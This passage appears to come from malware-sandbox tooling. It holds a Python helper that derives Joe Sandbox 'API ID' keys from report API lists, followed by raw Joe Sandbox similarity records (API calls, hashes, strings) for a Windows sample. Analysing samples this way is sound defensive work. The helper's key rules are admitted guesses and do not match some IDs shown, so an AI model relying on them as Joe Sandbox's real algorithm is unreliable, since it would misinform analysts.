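        "• Part of subcall function 00007FF65A36E8C4: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A36E90F",
        "• Part of subcall function 00007FF65A36E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF65A36E926",
        "• Part of subcall function 00007FF65A36E8C4: CloseHandle.KERNEL32 ref: 00007FF65A36E933",
        "• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A371A4B",
    ],
    "findclose": [
        "• Part of subcall function 00007FF65A363E88: FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD",
        "• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35E9A3",
    ],
}

# One bullet line: optional "Part of subcall function <addr>:" prefix, then the
# exported symbol, then ".MODULE", an argument list and "ref:" which we ignore.
_API_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"  # optional subcall prefix
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)"                 # exported symbol
)

# ASSUMPTIONS (not documented by Joe Sandbox, inferred from the IDs on this page):
# Get/Set verb prefixes carry no signal and are dropped; tokens shorter than
# three characters (the A/W suffixes, "UI") are dropped as well.
_NOISE_VERBS = {"Get", "Set"}
_MIN_TOKEN = 3


def api_name(line: str) -> str:
    """Return the bare API symbol from one bullet line of an 'APIs' list."""
    text = line.strip().lstrip("•").strip()
    m = _API_LINE.match(text)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    return m.group("name")


def tokens(name: str) -> list[str]:
    """Split a Win32 symbol into CamelCase words; CRT helpers ('_...') stay whole."""
    if name.startswith("_"):
        return [name]
    parts = re.findall(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*", name)
    return [p for p in parts if p not in _NOISE_VERBS and len(p) >= _MIN_TOKEN]


def api_id(names) -> str:
    """Build the 'API ID' key: word groups in descending frequency, '$'-separated,
    each group sorted by code point (uppercase < '_' < lowercase)."""
    counts = Counter(t for n in names for t in tokens(n))
    by_count: dict[int, list[str]] = {}
    for tok, c in counts.items():
        by_count.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(by_count[c])) for c in sorted(by_count, reverse=True))


def api_id_from_lines(lines) -> str:
    """Convenience wrapper: raw report bullet lines -> API ID key."""
    return api_id([api_name(line) for line in lines])


if __name__ == "__main__":
    for label, lines in REPORT_RECORDS.items():
        print(f"{label:10s} {api_id_from_lines(lines)}")
```

Because the key ignores call order, argument values and addresses, it is stable across rebuilds of the same source and is what makes two reports' function lists comparable: run the wrapper over the API lists of a second sample and match on equal keys before comparing the fuzzy hashes.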

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 0a6b65ba3c2ef67b0cfa03751de4ada799e5c7a8dedc28ec52f37c2c81ce86c7
                                      • Instruction ID: 079c92ebd2724a96119b8b90a3141b98cac883e7f89d87d2dba34b2e30d68055
                                      • Opcode Fuzzy Hash: 0a6b65ba3c2ef67b0cfa03751de4ada799e5c7a8dedc28ec52f37c2c81ce86c7
                                      • Instruction Fuzzy Hash: 7941D362B18A9641EE149A17EA4437AA6A1FF48BC4F4C8435EE4CE7F4ADF3CD4518300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c3f9eec68b9aa097e7a346dc7d65a3eb89df7b1b9f11e5dec18f29aa32891063
                                      • Instruction ID: 0ca080138fa24247cd07d777f1f2b3774d7b9e4b316c7e7db56976855cf4b313
                                      • Opcode Fuzzy Hash: c3f9eec68b9aa097e7a346dc7d65a3eb89df7b1b9f11e5dec18f29aa32891063
                                      • Instruction Fuzzy Hash: BB410F22A08B4281EE148F29E54537A63A1EF49FDCF180175EA5EE7B99DF3CE0808740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: HandleModule$AddressFreeLibraryProc
                                      • String ID:
                                      • API String ID: 3947729631-0
                                      • Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                      • Instruction ID: 530584a7ce49da282be7b36dcecbf1620dec54c0e6b9ea939c7ec5f56393be3a
                                      • Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                      • Instruction Fuzzy Hash: 18419121E1AB4386FB649F15E85017C2AA1AF90B48F5C44BADA0DFB695DF3DF846C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 680105476-0
                                      • Opcode ID: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                      • Instruction ID: 1f187b4edcd72e05140205b65d8c887d4d414cde34ce28198ef2f940abab3a8f
                                      • Opcode Fuzzy Hash: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                      • Instruction Fuzzy Hash: BF21A122A0924185EA14AA95E4102796390EF08BF8F6C0B70EE3DE7BD1EE7CE0518340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                      • Instruction ID: 8b46ca9a58f2cbbf71c690f40e15d1da207afacff59d820cb11e031324015ea5
                                      • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                      • Instruction Fuzzy Hash: 5B11492291D7878AE764AF50F58063962A5FF40388F5D05B5EA8DF7796DF2CE8008700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A37F024: GetDlgItem.USER32 ref: 00007FF65A37F063
                                        • Part of subcall function 00007FF65A37F024: ShowWindow.USER32 ref: 00007FF65A37F089
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F09E
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0B6
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0D7
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F0F3
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F136
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F154
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F168
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F192
                                        • Part of subcall function 00007FF65A37F024: IsDlgButtonChecked.USER32 ref: 00007FF65A37F1AA
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A37FC83
                                      Similarity
                                      • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 4003826521-0
                                      • Opcode ID: c82d22960263f5080fbf5d7fa9fd557b002d60d02d52c0d7f6911a267ba6a1b0
                                      • Instruction ID: 4a50f20ac001444a510884731f5a5524e672b5d7a8a4dbecdd54c375d3a9767a
                                      • Opcode Fuzzy Hash: c82d22960263f5080fbf5d7fa9fd557b002d60d02d52c0d7f6911a267ba6a1b0
                                      • Instruction Fuzzy Hash: 65010862E1868682FD109764E44636D6351FF89798F141331EB9CD6BC6DE2CD181C600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c25d9a2942aeea5ec892b1c1f6dc86836f60874112994e92993b745fecf7f191
                                      • Instruction ID: 3613f16bcc0331573dfb789bb0f1cb5ca9de78d28d780e3cad9764d7092e489a
                                      • Opcode Fuzzy Hash: c25d9a2942aeea5ec892b1c1f6dc86836f60874112994e92993b745fecf7f191
                                      • Instruction Fuzzy Hash: 1C01C4A2E1868242EA149B28F4512297361FF897A8F445271EA9CE7AA5EF3CD1408704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A381584: GetModuleHandleW.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815AB
                                      • DloadProtectSection.DELAYIMP ref: 00007FF65A381549
                                      Similarity
                                      • API ID: DloadHandleModuleProtectSection
                                      • String ID:
                                      • API String ID: 2883838935-0
                                      • Opcode ID: 5d635646d0b38b69c8413dcc35f979929b883fe76a3a9121299be0c3cf3c6897
                                      • Instruction ID: 74c00693628e0647ec38a7ab3b387abb54ab7632c50b96164614d7b1352725d3
                                      • Opcode Fuzzy Hash: 5d635646d0b38b69c8413dcc35f979929b883fe76a3a9121299be0c3cf3c6897
                                      • Instruction Fuzzy Hash: CF11DB61E09A0B85FB51DF16E8413B02791AF8434CF1C05B6C90EE72A5EF3CA5958710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                      • Instruction ID: 9a1d099745c3b44b2cd69649a8042e68a5bbb8c2f3f2bfbfb124cd6f36889929
                                      • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                      • Instruction Fuzzy Hash: DDF0BE50B0F60752FE956B669A127B852806F98B8CF4C44B1CD0FE63D3FE2CF8818220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A36407C: FindFirstFileW.KERNELBASE ref: 00007FF65A3640CB
                                        • Part of subcall function 00007FF65A36407C: FindFirstFileW.KERNELBASE ref: 00007FF65A36411E
                                        • Part of subcall function 00007FF65A36407C: GetLastError.KERNEL32 ref: 00007FF65A36416F
                                      • FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                      • Instruction ID: 44fc9d82b2af519eefe3457cfbbd4a32a12f7e817390880fbc5ef017c8e5c810
                                      • Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                      • Instruction Fuzzy Hash: 54F0C26290C28185EA509B75A50527927609F0ABBCF2C13B4EA3ED73DBCE29D494C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF65A362036), ref: 00007FF65A3620B6
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                      • Instruction ID: 170247fd519ef46677fa8a8939e94743be06043a8df98b04dee0629bd4757086
                                      • Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                      • Instruction Fuzzy Hash: 36F08C22E08A4299FB248B60E4402796660EF15B7CF4E53B5D67CC66D4EE28D895C310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                      • Instruction ID: 2b194c0beb8733f9f898270d27ef70c684bd4c705463ecb862d81dc2807a58f3
                                      • Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                      • Instruction Fuzzy Hash: C4F01C10F0F24785FF956BB259112B952905F947E8F4C46B0DD6EE62C1EE2CE9818220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: 565d15643e4f128e618b680bb6b12741a5b1e404c2efc63b883caeba7534f588
                                      • Instruction ID: f6b3b948f463389cb3e0ddbf37743dc17200ff759caefae7b5002e055295ff17
                                      • Opcode Fuzzy Hash: 565d15643e4f128e618b680bb6b12741a5b1e404c2efc63b883caeba7534f588
                                      • Instruction Fuzzy Hash: 05E0C252F2055582FF20AF7AC841AB91320EF8CF88B4C10B0CE0CD7322CE28C4958700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                      • Instruction ID: 24797aa84cdcdc8d4b7495c0b4f9e375509fb8ca88fd3dcd786550a4ddd92ae2
                                      • Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                      • Instruction Fuzzy Hash: 01D01216D09841D2DD1097799C5303C1350AF9273DFA807B0D67EE27E1CE1D94969310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 2659423929-3508440684
                                      • Opcode ID: d6048e4671e9a0492a16f8b45c177de304acdfbade6685641185a67b0a4ca0b0
                                      • Instruction ID: 6a17431f573b8bccd630016bc5838f7b17efd1bb3cabc34969079516194371a9
                                      • Opcode Fuzzy Hash: d6048e4671e9a0492a16f8b45c177de304acdfbade6685641185a67b0a4ca0b0
                                      • Instruction Fuzzy Hash: AC62C062F0968285FB00DB79D4452AD2761EF897ACF584271DA2DE7AEADF3CD185C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                      • String ID: %ls$%s: %s
                                      • API String ID: 2539828978-2259941744
                                      • Opcode ID: ec353a941498cb09e5f235a3d7af6150cb1ca2ce858efb67fcdeeb8d51090ce8
                                      • Instruction ID: 08289ef9a6305ffde25cb0cca7bfc626e046c19e27a204eb404b71e99d89e9ff
                                      • Opcode Fuzzy Hash: ec353a941498cb09e5f235a3d7af6150cb1ca2ce858efb67fcdeeb8d51090ce8
                                      • Instruction Fuzzy Hash: E0B2DA62E1968382EA109B25E4451BE6361FFCA798F184376E79DE3BD6DF6CD240C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfomemcpy_s
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 1759834784-2761157908
                                      • Opcode ID: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                      • Instruction ID: 3dc1ebe071814ea4a857b371c3f28d726957b3ddabb1e6d8103f2291d6050ec4
                                      • Opcode Fuzzy Hash: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                      • Instruction Fuzzy Hash: 3CB2E7B2A086828FE7658E69D6406FD37A5FF4478CF585179DA0AF7B84DF38E5048B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                      • String ID: rtmp
                                      • API String ID: 3587137053-870060881
                                      • Opcode ID: 2fe5fbcff99fc9507cc17e5606f473ac87ac8f10dc599feaa6c4721c02e64643
                                      • Instruction ID: 1c3008000ea0064e45fd4749509170358de37ca8e1e79511825dc1b07ca4e00b
                                      • Opcode Fuzzy Hash: 2fe5fbcff99fc9507cc17e5606f473ac87ac8f10dc599feaa6c4721c02e64643
                                      • Instruction Fuzzy Hash: 7DF1DF22B08B8285EF10DF65D8801BD67A1EF85788F581672EA4DE7BA9DF3CD584C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1693479884-0
                                      • Opcode ID: ff03b4dd7c267ba7113e5d86362d42cdaf99bc6da73fd8bf745a729d61054135
                                      • Instruction ID: cefcdbf12853f1cb336d2d278f68602892a295a52b2dcbda40c63bc40760b129
                                      • Opcode Fuzzy Hash: ff03b4dd7c267ba7113e5d86362d42cdaf99bc6da73fd8bf745a729d61054135
                                      • Instruction Fuzzy Hash: 30A19262F15B5285FF048FB9D8445BD2361AF85BA8B585275DE2DF7BC9DE3CE0818200
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                      • Instruction ID: 2089d55e0e4cebe574e7b313dd25a3efb2f1b7f5200c3f336c1318a578f879d8
                                      • Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                      • Instruction Fuzzy Hash: DC315076609B8299EB609F60E8903ED7764FB84748F484079DA4ED7B98DF38D548C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                      • Instruction ID: 53d163f5c77d8bd3e8ae5b71bbdd634cb426a924d25a3cf9af4cec21280bdc5d
                                      • Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                      • Instruction Fuzzy Hash: 8F318436609B829ADB60CF25E8402AE77A4FF84758F580175EA9DD3B58DF3CD545CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 03cf03922f8e963b9c545b117e3dfb1ed80d273b657bcb82ca2a71330a30b635
                                      • Instruction ID: 4e44441f32f5c22aeb2dfe440ffe308f09b7c92804614e7a5ed8b73f8fa73cbd
                                      • Opcode Fuzzy Hash: 03cf03922f8e963b9c545b117e3dfb1ed80d273b657bcb82ca2a71330a30b635
                                      • Instruction Fuzzy Hash: 29B1C322B1578686EB10AB69D8402ED23A1FF8979CF585271EE4DE7B99EF3CD540C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65A38FA44
                                        • Part of subcall function 00007FF65A3878B4: GetCurrentProcess.KERNEL32(00007FF65A390C4D), ref: 00007FF65A3878E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                      • String ID: *?$.
                                      • API String ID: 2518042432-3972193922
                                      • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                      • Instruction ID: 46f857de5d729929ff2855a6ee7326a8a5571514fc84a02e820eeca771162534
                                      • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                      • Instruction Fuzzy Hash: 1C51D462B16B9686EF11DFA298104BC67A4FF48BDCB584571DE1DE7B8ADE3CD0428300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
